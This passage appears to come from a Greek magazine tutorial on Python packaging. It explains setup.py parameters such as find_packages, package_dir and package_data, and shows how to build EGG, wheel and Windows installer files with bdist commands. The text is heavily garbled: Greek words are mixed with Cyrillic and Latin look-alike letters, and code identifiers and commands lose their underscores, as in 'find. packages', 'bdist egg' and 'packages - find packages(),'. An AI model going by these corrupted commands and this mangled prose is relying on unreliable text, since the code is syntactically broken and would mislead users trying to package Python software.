αντιλαμβάνεστε αυτή η εργασία εἶναι επίπονη yia ἑνα μεγάλο project, ενὠ ενδέχεται 
και να ξεχάσουμε капоіо αρχείο. Π' αυτούς τους λόγους, όταν ορἰζουµε την пара- 
μετρο packages εἶναι φρόνιμο να χρησιμοποιούμε τη συνάρτηση find. packages. 
Αυτἠ η συνάρτηση εντοπἰζει бла τα αρχεία µε κὠδικα, nou βρἰσκονται като апо 
κάποιον κατάλογο. Βέβαια, auróv τον "κάποιον κατάλογο" πρέπει va rov προσδιορἰ- 
coupe. Στο παράδειγμά µας χρησιμοποιούμε τη συνάρτηση find. packages δίνοντας 
σαν παράμετρο τον κατάλογο src. Αυτός ο κατάλογος αποτελεἰ τον "ριζικὸ катало- 
yo" (root directory), като апо rov onoio βρἰσκονται όλα τα αρχεἰα µε κὠδικα. Ava- 
PWTIEOTE που ακριβώς βρἰσκεται ο κατάλογος src; Όταν εκτελεστεἰ η συνάρτηση 
find. packages, θα αναζητήσει τον κατάλογο src µέσα στον κατάλογο ónou βρἰσκε- 
ται και το αρχεἰο setup.py. Με àiya λόγια, η θέση του καταλόγου που δίνουμε στη 
συνάρτηση find. packages εἶναι σχετικἠ ως прос τη θέση στην опоіа βρίσκεται το 
аругіо setup.py. 


Αμέσως μετὰ opiGoupe την παράμετρο package. dir, µέσω της οποίας órnAovoupe και 
πάλι τον ἰδιο κατάλογο: Екеіуоу като апо rov onoio βρίσκονται όλα ra αρχεία µε 
κὠδικα. Αυτή η επανάληψη μοιάζει περιττἠ κι εδὠ nou τα λέμε εἶναι! Н παράμετρος 
package. dir χρησιμοποιείται апо τη βιβλιοθήκη distutils, που αναλάμβανε τη δημι- 
oupyia πακέτων, πριν την ἐλευση της setuptools. Τελικά, θα μπορούσε va πει κανεὶς 
ότι η παράμετρος package dir апотелеі Eva "εξελικτικὀ απομεινἀρι", το οποίο όµως 
εἶναι απαραἰτητο! Σε auró το σημείο πρέπει να υπογραμμἰσουμε ша λεπτομέρεια. 
Ау η εφαρµογἠ µας διέθετε λίγα μόνο αρχεία µε κὠδικα, τα οποία βρίσκονταν στον 
ἰδιο κατάλογο HE то setup.py, θα μπορούσαμε va паралеіфосне EVTEAWC τη δήλωση 
της package dir. Επιπρόσθετα, η εκτέλεση της find. packages θα ἦταν απλούστερη, 
αφού δεν θα χρειαζόταν να της δώσουμε κάποια παράμετρο. О δύο σχετικὲς үрар- 
μὲς θα μπορούσαν να αντικατασταθούν апо την εξἠς uia: 


packages - find packages(), 


To παρἀδειγμἁ µας συνεχίζεται ре TH δήλωση της παραμέτρου ру modules. Με αυτή 
την παράμετρο δηλώνουμε ὁσα αρχεἰα κὠδικα ενδέχεται να βρίσκονται *EEw* апо 
τον κατάλογο src, τον οποίο δηλώσαμε σαν "ρίζα" του κὠδικα. Τέλος, µε την пара- 
μετρο package data δηλώνουμε όλα τα Вопдптіка αρχεία που ενδέχεται να συνο- 
δεύουν τον κὠδικά µας. Στο парабеіура рас, ἐχουμε περιγράψει όλα τα αρχεία µε 
κατάληξη txt ἡ jpg. 


Όπως εἰναι πιθανό va υποψιάζεστε, η συνάρτηση setup δέχεται περισσότερες napa- 
μέτρους апо αυτὲς nou παρουσιάσαμε. Εξάλλου, ακόμα κι αυτὲς που εἰδαμε ¿xouv 
περισσότερες λειτουργίες апо астёс που αναφέραμε. Αν θέλετε να εµβαθύνετε στο 
θέμα, μπορείτε να διαβάσετε τη OXETIKN τεκμηρίωση στις διευθύνσεις https://docs. 
python.org/2/distutils/setupscript.html και https://pythonhosted.org/setuptools/ 
setuptools.html. Ας συνεχίσουμε тора τη μελέτη rou παραδεϊγματὸς рас... 


Αφού ξεμπερδέιψουµε ре TAV κατασκευὴ rou αρχείου setup.py, прёпеі va ro τοποθε- 
τήσουµε στον κατάλογο nou περιλαμβάνει жӧЛоџс̧* τους καταλόγους και та αρχεἰα 
της εφαρµογἠς µας. Αμέσως μετὰ, θα εἰμαστε ἑτοιμοι να προχωρήσουμε στη δημι- 
oupyia του πακέτου εγκατάστασης. Па να δημιουργήσουμε το πολυπόθητο αρχεἰο 
EGG, аркеі να δώσουμε κάτι τέτοιο: 

python setup.py bdist egg 


Όταν ολοκληρωθεἰ η διαδικασία θα διαπιστώσουμε Ori ἐχει δηµιουργηθεἰ o ката- 
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λογος dist. Μέσα σε αυτόν θα βρούμε Eva аругіо EGG, µε то буора nou δηλώσαμε 
εντὸς TOU setup.py. Στο παράδειγμά µας θα βρούμε ro αρχείο ту. great. app.egg. 


Αυτό ἠταν ὀλο! Το συγκεκριμένο πακέτο μπορούμε να το δώσουμε σε οποιονδἠπο- 
τε θέλει να προσθέσει την εφαρμογἠ µας στο σὐστημά του. Εφόσον πρὀκειται για 
πακέτο EGG, η εγκατἀστασἠ του πραγματοποιείται πανεύκολα µε то easy install: 


easy install my great app.egg 


Пакёта yia ro pip 


Περνώντας στο στρατὀπεδο тос pip και των αρχείων wheel, πρέπει να σας πούμε От! 
δεν υπάρχει каша διαφοροποίηση όσον αφορά την κατασκευἠ του αρχείου setup.py! 
Па τη δημιουργία του πακέτου wheel, ӧрос̧, πρέπει να ἐχουμε εγκατεστημένο στο 
σὐστημά µας το ομώνυμο πακέτο. Κάτι τέτοιο γίνεται εὐκολα µε τη βοήθεια rou pip: 


pip install wheel 


Мета апо auto ro απλὀ βήμα κι εφόσον διαθέτουμε NON To setup.py, μπορούμε va 
δημιουργήσουμε ro прото рас πακέτο wheel. Па то σκοπὀ αυτό аркеі να δώσουμε 
κάτι τέτοιο: 


python setup.py bdist wheel 


Όπως βλέπετε, GUTO nou κάνουμε εἶναι να εκτελἐσουµε και палі то setup.py, αλλά 
auT τη фора χρησιμοποιούμε την παράμετρο bdist wheel. Еутос ολἰγου θα δημι- 
ουργηθεἰ ο κατάλογος dist, µέσα στον onoio θα βρούμε αρχείο ту great. app.whl. 
Μια εναλλακτική μέθοδος για τη δημιουργία πακέτου wheel, στην περίπτωση nou 
έχουμε κατασκευάσει NON το πακέτο egg, εἶναι µε τη χρήση του εργαλείου wheel και 
της παραμέτρου convert και το буора: 


wheel convert ту great app.egg 


Προφανώς, η εκτέλεση του παραπάνω θα δημιουργήσει και палі το αρχείο ту. 
great app.whl. Πα ro τέλος, αφήσαμε µια λειτουργία nou θα харопо! се! ιδιαίτερα 
τους αµετανόητους οπαδούς των Windows. Н βιβλιοθήκη setuptools επιτρέπει την 
εὐκολη δηµιουργία ενὸς εκτελἑἐσιµου αρχείου EXE, το onoio θα εγκαθιστά την ефар- 
Hoyñ µας! Φυσικά, για QUTA τη διαδικασία θα хрвіастоўне και палі Eva αρχεἰο setup. 
py, µε τη борц και το περιεχόµενο nou εξετάσαµε παραπάνω. Па τη δημιουργία του 
εκτελἐσιµου αρκεἰ να δώσουμε KÜTI тётоіо: 


python setup.py bdist wininst 


Мета την εκτέλεση του παραπάνω, θα βρούμε rov (κλασικὀ πλέον) κατάλογο dist. 
Μέσα σε αυτόν θα ἐχει δημιουργηθεὶ ἑνας οδηγὸς εγκατάστασης (install wizzard) 
για την εφαρμογἠ µας, παρόμοιος µε αυτόν που χρησιμοποιείται για τις εφαρμογές 
των Windows. Αξίζει να σημειώσουμε Ori, αν εκτελέσουµε την εγκατάσταση µέσω 
αυτού του οδηγού, η εφαρμογἠ µας θα εμφανίζεται στην περιοχἠ "Προσθαφαίρεση 
προγραμμάτων" του nivaka ελἐγχου των Windows. 


О συναρπαστικὀὸς κόσμος rov εργαλείων διανοµἠς και εγκατάστασης της Python δεν 
σταματάει εδὠ. Н συνέχεια, στο τεύχος 035, αναμένεται συναρπαστικότερη. Μην 
αφήνετε τη ζέστη να σας χαλαρώνει — keep programming! 
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